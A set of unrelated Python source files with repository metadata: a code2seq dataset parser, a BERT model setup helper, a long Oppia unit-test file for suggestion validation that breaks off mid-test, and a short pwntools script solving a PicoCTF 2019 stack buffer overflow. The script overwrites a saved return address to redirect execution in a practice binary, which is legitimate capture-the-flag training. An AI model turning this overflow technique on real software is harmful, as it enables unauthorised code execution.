GraphToOutputExampleNotValidError if the GraphToOutputExample is not
valid.
Returns:
A dictionary with keys 'split' and 'GraphToOutputExample'. Values are the
split(train/validation/test) the data belongs to, and the
GraphToOutputExample instance.
"""
# pylint: enable=line-too-long
split = raw_data['split']
target_label = raw_data['target_label']
ast_paths = raw_data['ast_paths']
graph_to_output_example = GraphToOutputExample()
cur_node_id = 0
ast_path_root_node_ids = []
# This is the root node of all AST path nodes.
graph_to_output_example.add_node(cur_node_id, 'C2C_ROOT', 'C2C_ROOT')
c2c_root_node_id = cur_node_id
cur_node_id += 1
for ast_path in ast_paths:
# The start_token subtree
start_token = ast_path[0]
graph_to_output_example, cur_node_id, start_token_node_id = (
self._construct_token_subtree(
graph_to_output_example, start_token, cur_node_id, 'START_TOKEN'))
# The ast_nodes subtree
ast_nodes = ast_path[1]
graph_to_output_example, cur_node_id, ast_node_ids = (
self._construct_ast_nodes_subtree(
graph_to_output_example, ast_nodes, cur_node_id))
# The end_token subtree
end_token = ast_path[2]
graph_to_output_example, cur_node_id, end_token_node_id = (
self._construct_token_subtree(
graph_to_output_example, end_token, cur_node_id, 'END_TOKEN'))
# Connects the start_token root node with the first node in the
# ast_nodes subtree.
graph_to_output_example.add_edge(
start_token_node_id, ast_node_ids[0], 'START_AST_PATH')
# Connects the end_token root node with the last node in the
# ast_nodes subtree.
graph_to_output_example.add_edge(
end_token_node_id, ast_node_ids[-1], 'END_AST_PATH')
# Add a root AST path node representing the AST path.
graph_to_output_example.add_node(
cur_node_id, 'ROOT_AST_PATH', 'ROOT_AST_PATH')
ast_path_root_node_id = cur_node_id
ast_path_root_node_ids.append(ast_path_root_node_id)
cur_node_id += 1
# Connects the root AST path node with the start_token and end_token
# subtree.
graph_to_output_example.add_edge(
ast_path_root_node_id, start_token_node_id, 'START_TOKEN')
graph_to_output_example.add_edge(
ast_path_root_node_id, end_token_node_id, 'END_TOKEN')
# Connects the root AST path node with all nodes in the ast_nodes subtree.
for node_id in ast_node_ids:
graph_to_output_example.add_edge(ast_path_root_node_id, node_id,
'AST_NODE')
# Connects the code2seq root node with all AST path root node.
for ast_path_root_node_id in ast_path_root_node_ids:
graph_to_output_example.add_edge(c2c_root_node_id, ast_path_root_node_id,
'AST_PATH')
for subtoken in target_label.split('|'):
graph_to_output_example.add_token_output(subtoken)
for transformation_fn in self.transformation_funcs:
graph_to_output_example = transformation_fn(graph_to_output_example)
if not graph_to_output_example.check_if_valid():
raise GraphToOutputExampleNotValidError(
'Invalid GraphToOutputExample found {}'.format(
graph_to_output_example))
for filter_fn in self.filter_funcs:
if not filter_fn(graph_to_output_example):
graph_to_output_example = None
break
return {'split': split, 'GraphToOutputExample': graph_to_output_example}
class C2SExtractor(beam.DoFn):
"""Class to read the code2seq dataset."""
def __init__(self, random_split_fn, use_random_split):
self.random_split_fn = random_split_fn
self.use_random_split = use_random_split
def _read_data(self, file_path):
"""Read and parse the code2seq raw data file.
Each line in the code2seq raw data file has the following format:
'<token> <token>,<node1>,<node2>,<token> <token>,<node3>,<token>'
The first token is the function name. The rest are the AST paths, separated
with a whitespace.
Args:
file_path: Path to a code2seq data file.
Yields:
A tuple of the function name, and a list of AST paths.
"""
with open(file_path) as f:
for line in f:
fields = line.rstrip().split(' ')
# The subtokens are still separated by '|', we handle them
# together in self.raw_data_to_graph_to_output_example()
target_label = fields[0]
ast_paths = []
for field in fields[1:]:
if field:
# The subtokens are still separated by '|', we handle them
# together in self.raw_data_to_graph_to_output_example()
ast_paths.append(field.split(','))
yield target_label, ast_paths
def _get_split(self, file_path):
"""Get the data split based on the filename suffix."""
if file_path.endswith('train.c2s'):
return constants.TRAIN_SPLIT_NAME
elif file_path.endswith('val.c2s'):
return constants.VALIDATION_SPLIT_NAME
else:
return constants.TEST_SPLIT_NAME
def process(self, file_path):
split = self._get_split(file_path)
for target_label, ast_paths in self._read_data(file_path):
yield {
'split': self.random_split_fn() if self.use_random_split else split,
'target_label': target_label,
'ast_paths': ast_paths
}
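# Illustrative usage sketch (the stage 1 output directory is an assumption;
# the methods shown are defined on Code2SeqDataset above):
#
#     dataset = Code2SeqDataset('/tmp/plur/code2seq_stage_1', dataset_size='small')
#     dataset.download_dataset()
#     train_file, validation_file, test_file = dataset.get_all_raw_data_paths()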
| google-research/plur | plur/stage_1/code2seq_dataset.py | Python | apache-2.0 | 16,900 |
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
# Fill the stack buffer up to the saved return address (76 bytes here), then
# overwrite it with the address to jump to (presumably a win/flag function
# in ./vuln).
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()
| Caesurus/CTF_Writeups | 2019-PicoCTF/exploits/exploit_overflow-1.py | Python | apache-2.0 | 624 |
# Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Provides the setup for the experiments."""
from pytorch_pretrained_bert import modeling
from pytorch_pretrained_bert import tokenization
import torch
import embeddings_helper
def setup_uncased(model_config):
"""Setup the uncased bert model.
Args:
model_config: The model configuration to be loaded.
Returns:
tokenizer: The tokenizer to be used to convert between tokens and ids.
model: The model that has been initialized.
device: The device to be used in this run.
embedding_map: Holding all token embeddings.
"""
# Load pre-trained model tokenizer (vocabulary)
tokenizer = tokenization.BertTokenizer.from_pretrained(model_config)
# Load pre-trained model (weights)
model = modeling.BertModel.from_pretrained(model_config)
_ = model.eval()
# Set up the device in use
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('device : ', device)
model = model.to(device)
# Initialize the embedding map
embedding_map = embeddings_helper.EmbeddingMap(device, model)
return tokenizer, model, device, embedding_map
def setup_bert_vanilla(model_config):
"""Setup the uncased bert model without embedding maps.
Args:
model_config: The model configuration to be loaded.
Returns:
tokenizer: The tokenizer to be used to convert between tokens and ids.
model: The model that has been initialized.
device: The device to be used in this run.
"""
# Load pre-trained model tokenizer (vocabulary)
tokenizer = tokenization.BertTokenizer.from_pretrained(model_config)
# Load pre-trained model (weights)
model = modeling.BertModel.from_pretrained(model_config)
_ = model.eval()
# Set up the device in use
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('device : ', device)
model = model.to(device)
return tokenizer, model, device
def setup_bert_mlm(model_config):
"""Setup the uncased bert model with classification head.
Args:
model_config: The model configuration to be loaded.
Returns:
tokenizer: The tokenizer to be used to convert between tokens and ids.
model: The model that has been initialized.
device: The device to be used in this run.
"""
# Load pre-trained model tokenizer (vocabulary)
tokenizer = tokenization.BertTokenizer.from_pretrained(model_config)
# Load pre-trained model (weights)
  model = modeling.BertForMaskedLM.from_pretrained(model_config)
_ = model.eval()
# Set up the device in use
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('device : ', device)
model = model.to(device)
# Initialize the embedding map
embedding_map = embeddings_helper.EmbeddingMap(device, model.bert)
return tokenizer, model, device, embedding_map
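# Illustrative usage sketch (the model name string is an assumption following
# pytorch_pretrained_bert's pretrained-model naming):
#
#     tokenizer, model, device, embedding_map = setup_uncased('bert-base-uncased')
#     ids = tokenizer.convert_tokens_to_ids(tokenizer.tokenize('hello world'))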
| PAIR-code/interpretability | text-dream/python/helpers/setup_helper.py | Python | apache-2.0 | 3,457 |
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for suggestion registry classes."""
from __future__ import annotations
import datetime
import os
from core import feconf
from core import utils
from core.domain import config_services
from core.domain import exp_domain
from core.domain import exp_fetchers
from core.domain import exp_services
from core.domain import fs_domain
from core.domain import fs_services
from core.domain import html_validation_service
from core.domain import question_domain
from core.domain import question_services
from core.domain import skill_services
from core.domain import state_domain
from core.domain import suggestion_registry
from core.domain import suggestion_services
from core.platform import models
from core.tests import test_utils
(suggestion_models,) = models.Registry.import_models([models.NAMES.suggestion])
class MockInvalidSuggestion(suggestion_registry.BaseSuggestion):
def __init__(self): # pylint: disable=super-init-not-called
pass
class BaseSuggestionUnitTests(test_utils.GenericTestBase):
"""Tests for the BaseSuggestion class."""
def setUp(self):
super(BaseSuggestionUnitTests, self).setUp()
self.base_suggestion = MockInvalidSuggestion()
def test_base_class_accept_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement accept.'):
self.base_suggestion.accept()
def test_base_class_get_change_list_for_accepting_suggestion_raises_error(
self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement '
'get_change_list_for_accepting_suggestion.'):
self.base_suggestion.get_change_list_for_accepting_suggestion()
def test_base_class_pre_accept_validate_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement'
' pre_accept_validate.'):
self.base_suggestion.pre_accept_validate()
def test_base_class_populate_old_value_of_change_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement'
' populate_old_value_of_change.'):
self.base_suggestion.populate_old_value_of_change()
def test_base_class_pre_update_validate_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement'
' pre_update_validate.'):
self.base_suggestion.pre_update_validate({})
def test_base_class_get_all_html_content_strings(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement'
' get_all_html_content_strings.'):
self.base_suggestion.get_all_html_content_strings()
def test_base_class_get_target_entity_html_strings(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement'
' get_target_entity_html_strings.'):
self.base_suggestion.get_target_entity_html_strings()
def test_base_class_convert_html_in_suggestion_change(self):
def conversion_fn():
"""Temporary function."""
pass
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement'
' convert_html_in_suggestion_change.'):
self.base_suggestion.convert_html_in_suggestion_change(
conversion_fn)
class SuggestionEditStateContentUnitTests(test_utils.GenericTestBase):
"""Tests for the SuggestionEditStateContent class."""
AUTHOR_EMAIL = '[email protected]'
REVIEWER_EMAIL = '[email protected]'
ASSIGNED_REVIEWER_EMAIL = '[email protected]'
fake_date = datetime.datetime(2016, 4, 10, 0, 0, 0, 0)
def setUp(self):
super(SuggestionEditStateContentUnitTests, self).setUp()
self.signup(self.AUTHOR_EMAIL, 'author')
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.suggestion_dict = {
'suggestion_id': 'exploration.exp1.thread1',
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': feconf.ENTITY_TYPE_EXPLORATION,
'target_id': 'exp1',
'target_version_at_submission': 1,
'status': suggestion_models.STATUS_ACCEPTED,
'author_name': 'author',
'final_reviewer_id': self.reviewer_id,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'state_1',
'new_value': 'new suggestion content',
'old_value': None
},
'score_category': 'content.Algebra',
'language_code': None,
'last_updated': utils.get_time_in_millisecs(self.fake_date),
'edited_by_reviewer': False
}
def test_create_suggestion_edit_state_content(self):
expected_suggestion_dict = self.suggestion_dict
observed_suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertDictEqual(
observed_suggestion.to_dict(), expected_suggestion_dict)
def test_validate_suggestion_edit_state_content(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
def test_get_score_part_helper_methods(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertEqual(suggestion.get_score_type(), 'content')
self.assertEqual(suggestion.get_score_sub_type(), 'Algebra')
def test_validate_suggestion_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.suggestion_type = 'invalid_suggestion_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected suggestion_type to be among allowed choices'
):
suggestion.validate()
def test_validate_target_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.target_type = 'invalid_target_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected target_type to be among allowed choices'
):
suggestion.validate()
def test_validate_target_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.target_id = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected target_id to be a string'
):
suggestion.validate()
def test_validate_target_version_at_submission(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.target_version_at_submission = 'invalid_version'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected target_version_at_submission to be an int'
):
suggestion.validate()
def test_validate_status(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.status = 'invalid_status'
with self.assertRaisesRegex(
utils.ValidationError, 'Expected status to be among allowed choices'
):
suggestion.validate()
def test_validate_author_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.author_id = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected author_id to be a string'
):
suggestion.validate()
def test_validate_author_id_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.author_id = self.PSEUDONYMOUS_ID
suggestion.validate()
suggestion.author_id = ''
with self.assertRaisesRegex(
utils.ValidationError,
'Expected author_id to be in a valid user ID format'
):
suggestion.validate()
def test_validate_final_reviewer_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.final_reviewer_id = 1
with self.assertRaisesRegex(
utils.ValidationError, 'Expected final_reviewer_id to be a string'
):
suggestion.validate()
def test_validate_final_reviewer_id_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.final_reviewer_id = self.PSEUDONYMOUS_ID
suggestion.validate()
suggestion.final_reviewer_id = ''
with self.assertRaisesRegex(
utils.ValidationError,
'Expected final_reviewer_id to be in a valid user ID format'
):
suggestion.validate()
def test_validate_score_category(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected score_category to be a string'
):
suggestion.validate()
def test_validate_score_category_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'score.score_type.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected score_category to be of the form'
' score_type.score_sub_type'
):
suggestion.validate()
suggestion.score_category = 'invalid_score_category'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected score_category to be of the form'
' score_type.score_sub_type'
):
suggestion.validate()
def test_validate_score_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'invalid_score_type.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the first part of score_category to be among allowed'
' choices'
):
suggestion.validate()
def test_validate_change(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change = {}
with self.assertRaisesRegex(
utils.ValidationError, 'Expected change to be an ExplorationChange'
):
suggestion.validate()
def test_validate_score_type_content(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'question.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the first part of score_category to be content'
):
suggestion.validate()
def test_validate_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.cmd = 'invalid_cmd'
with self.assertRaisesRegex(
utils.ValidationError, 'Expected cmd to be edit_state_property'
):
suggestion.validate()
def test_validate_change_property_name(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.property_name = 'invalid_property'
with self.assertRaisesRegex(
utils.ValidationError, 'Expected property_name to be content'
):
suggestion.validate()
def test_validate_language_code_fails_when_language_codes_do_not_match(
self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.language_code = 'wrong_language_code'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected language_code to be None, received wrong_language_code'
):
suggestion.validate()
def test_pre_accept_validate_state_name(self):
self.save_new_default_exploration('exp1', self.author_id)
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
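        # Add a real state so that 'State A' passes pre-accept validation,
        # while an unknown state name should fail it.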
exp_services.update_exploration(
self.author_id, 'exp1', [
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_ADD_STATE,
'state_name': 'State A',
})
], 'Added state')
suggestion.change.state_name = 'State A'
suggestion.pre_accept_validate()
suggestion.change.state_name = 'invalid_state_name'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected invalid_state_name to be a valid state name'
):
suggestion.pre_accept_validate()
def test_populate_old_value_of_change_with_invalid_state(self):
self.save_new_default_exploration('exp1', self.author_id)
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.change.state_name = 'invalid_state_name'
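        # The state name does not exist in the exploration, so populating the
        # old value of the change is a no-op and old_value remains None.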
self.assertIsNone(suggestion.change.old_value)
suggestion.populate_old_value_of_change()
self.assertIsNone(suggestion.change.old_value)
def test_pre_update_validate_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': exp_domain.CMD_ADD_STATE,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': suggestion.change.state_name,
'new_value': 'new suggestion content',
'old_value': None
}
with self.assertRaisesRegex(
utils.ValidationError,
'The following extra attributes are present: new_value, '
'old_value, property_name'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_change_property_name(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_PARAM_CHANGES,
'state_name': suggestion.change.state_name,
'new_value': 'new suggestion content',
'old_value': None
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change property_name must be equal to content'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_change_state_name(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'invalid_state',
'new_value': 'new suggestion content',
'old_value': None
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change state_name must be equal to state_1'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_change_new_value(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
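        # Make the stored suggestion's new_value identical to the incoming
        # change's new_value so the 'new html must not match the old html'
        # check fires.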
new_content = state_domain.SubtitledHtml(
'content', '<p>new suggestion html</p>').to_dict()
suggestion.change.new_value = new_content
change = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': suggestion.change.state_name,
'new_value': new_content,
'old_value': None
}
with self.assertRaisesRegex(
utils.ValidationError, 'The new html must not match the old html'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_non_equal_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
with self.assertRaisesRegex(
utils.ValidationError,
'The new change cmd must be equal to edit_state_property'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_EXPLORATION_PROPERTY,
'property_name': 'title',
'new_value': 'Exploration 1 Albert title'
}))
def test_get_all_html_content_strings(self):
change_dict = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'state_1',
'new_value': {
'content_id': 'content',
